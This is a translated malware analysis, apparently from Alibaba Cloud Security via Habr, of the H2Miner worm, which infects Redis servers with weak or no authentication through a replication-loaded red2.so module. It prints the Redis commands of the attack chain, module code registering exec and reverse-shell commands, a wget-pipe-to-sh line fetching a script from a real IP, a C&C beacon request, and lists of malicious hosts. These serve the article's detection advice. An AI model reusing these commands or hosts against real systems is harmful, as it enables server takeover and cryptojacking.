Bir gün əvvəl layihəmin serverlərindən birinə bənzər bir qurd hücum etdi. “Bu nə idi?” sualına cavab axtarışında. Alibaba Cloud Security komandası tərəfindən əla məqalə tapdım. Habré-də bu məqaləni tapmadığım üçün onu xüsusilə sizin üçün tərcümə etmək qərarına gəldim <3
Giriş
Bu yaxınlarda Alibaba Cloud-un təhlükəsizlik komandası H2Miner-in qəfil yayılmasını aşkar etdi. Bu növ zərərli qurd Redis üçün avtorizasiyanın olmamasından və ya zəif parollardan sistemlərinizə şlüz kimi istifadə edir, bundan sonra o, master-slave sinxronizasiyası vasitəsilə öz zərərli modulunu qul ilə sinxronlaşdırır və nəhayət, bu zərərli modulu hücuma məruz qalan maşına yükləyir və zərərli proqramı həyata keçirir. təlimatlar.
Keçmişdə sistemlərinizə hücumlar, ilk növbədə, təcavüzkar Redis-ə daxil olduqdan sonra maşınınıza yazılmış planlaşdırılmış tapşırıqlar və ya SSH açarları ilə bağlı metoddan istifadə etməklə həyata keçirilirdi. Xoşbəxtlikdən, icazə nəzarəti ilə bağlı problemlər və ya müxtəlif sistem versiyaları səbəbindən bu üsul tez-tez istifadə edilə bilməz. Bununla belə, zərərli modulun yüklənməsinin bu üsulu birbaşa təcavüzkarın əmrlərini yerinə yetirə və ya sisteminiz üçün təhlükəli olan qabığa giriş əldə edə bilər.
İnternetdə yerləşdirilən çox sayda Redis serverinə görə (təxminən 1 milyon), Alibaba Cloud-un təhlükəsizlik komandası dostluq üçün xatırlatmaq üçün istifadəçilərə Redis-i onlayn paylaşmamağı və mütəmadi olaraq parollarının möhkəmliyini və onların pozulduğunu yoxlamağı tövsiyə edir. sürətli seçim.
H2Miner
H2Miner Linux əsaslı sistemlər üçün mədən botnetidir ki, sisteminizə müxtəlif yollarla, o cümlədən Hadoop iplik, Docker və Redis uzaqdan əmr icrası (RCE) zəifliklərində icazənin olmaması daxil ola bilər. Botnet məlumatlarınızı minalamaq, hücumu üfüqi şəkildə genişləndirmək və komanda və idarəetmə (C&C) rabitəsini saxlamaq üçün zərərli skriptləri və zərərli proqramları endirməklə işləyir.
Redis RCE
Bu mövzuda biliklər Pavel Toporkov tərəfindən ZeroNights 2018-də paylaşıldı. 4.0 versiyasından sonra Redis istifadəçilərə xüsusi Redis əmrlərini yerinə yetirmək üçün C ilə tərtib edilmiş faylları Redis-ə yükləmək imkanı verən plug-in yükləmə funksiyasını dəstəkləyir. Bu funksiya faydalı olsa da, master-slave rejimində faylların fullresync rejimi vasitəsilə kölə ilə sinxronlaşdırıla biləcəyi zəifliyi ehtiva edir. Bu, təcavüzkar tərəfindən zərərli faylları ötürmək üçün istifadə edilə bilər. Köçürmə tamamlandıqdan sonra təcavüzkarlar modulu hücuma məruz qalan Redis nümunəsinə yükləyir və istənilən əmri yerinə yetirirlər.
Zərərli proqram qurdlarının təhlili
Bu yaxınlarda Alibaba Cloud təhlükəsizlik komandası H2Miner zərərli mədənçi qrupunun ölçüsünün birdən-birə kəskin şəkildə artdığını aşkar etdi. Təhlillərə görə, hücumun baş verməsinin ümumi prosesi belədir:
H2Miner tam hüquqlu hücum üçün RCE Redis-dən istifadə edir. Təcavüzkarlar əvvəlcə qorunmayan Redis serverlərinə və ya zəif parolları olan serverlərə hücum edirlər.
Sonra əmrdən istifadə edirlər config set dbfilename red2.so fayl adını dəyişmək üçün. Bundan sonra hücumçular əmri yerinə yetirirlər slaveof master-slave replikasiya host ünvanını təyin etmək üçün.
Hücuma məruz qalan Redis nümunəsi təcavüzkara məxsus olan zərərli Redis ilə master-slave əlaqəsi qurduqda, təcavüzkar faylları sinxronlaşdırmaq üçün fullresync əmrindən istifadə edərək yoluxmuş modulu göndərir. Bundan sonra red2.so faylı hücuma məruz qalan maşına endiriləcək. Təcavüzkarlar daha sonra bu faylı yükləmək üçün ./red2.so yükləmə modulundan istifadə edirlər. Modul təcavüzkarın əmrlərini yerinə yetirə və ya hücuma məruz qalan maşına giriş əldə etmək üçün əks əlaqə (arxa qapı) başlada bilər.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
kimi zərərli əmri yerinə yetirdikdən sonra / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, təcavüzkar ehtiyat fayl adını sıfırlayacaq və izləri təmizləmək üçün sistem modulunu boşaltacaq. Bununla belə, red2.so faylı hələ də hücuma məruz qalan maşında qalacaq. İstifadəçilərə Redis instansiyasının qovluğunda belə şübhəli faylın olmasına diqqət yetirmələri tövsiyə olunur.
Resursları oğurlamaq üçün bəzi zərərli prosesləri öldürməklə yanaşı, təcavüzkar zərərli ikili faylları yükləmək və icra etməklə zərərli skriptin ardınca getdi. . Bu o deməkdir ki, hostda kinsing ehtiva edən proses adı və ya kataloq adı həmin maşının bu virusa yoluxduğunu göstərə bilər.
Əks mühəndislik nəticələrinə əsasən, zərərli proqram əsasən aşağıdakı funksiyaları yerinə yetirir:
- Faylların yüklənməsi və icrası
- Mədənçilik
- C&C rabitəsini saxlamaq və hücumçu əmrlərini yerinə yetirmək
Təsirinizi genişləndirmək üçün xarici tarama üçün masscan istifadə edin. Bundan əlavə, C&C serverinin IP ünvanı proqramda sərt kodlaşdırılıb və hücuma məruz qalan host HTTP başlığında zombi (promised server) məlumatının müəyyən edildiyi HTTP sorğularından istifadə edərək C&C rabitə serveri ilə əlaqə saxlayacaq.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Digər hücum üsulları
Qurd tərəfindən istifadə edilən ünvanlar və keçidlər
/qohumluq
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
şura
Birincisi, Redis İnternetdən əlçatan olmamalıdır və güclü parol ilə qorunmalıdır. Müştərilərin Redis qovluğunda red2.so faylının olmadığını və hostda fayl/proses adında “qohumluq” olmadığını yoxlamaları da vacibdir.
Mənbə: www.habr.com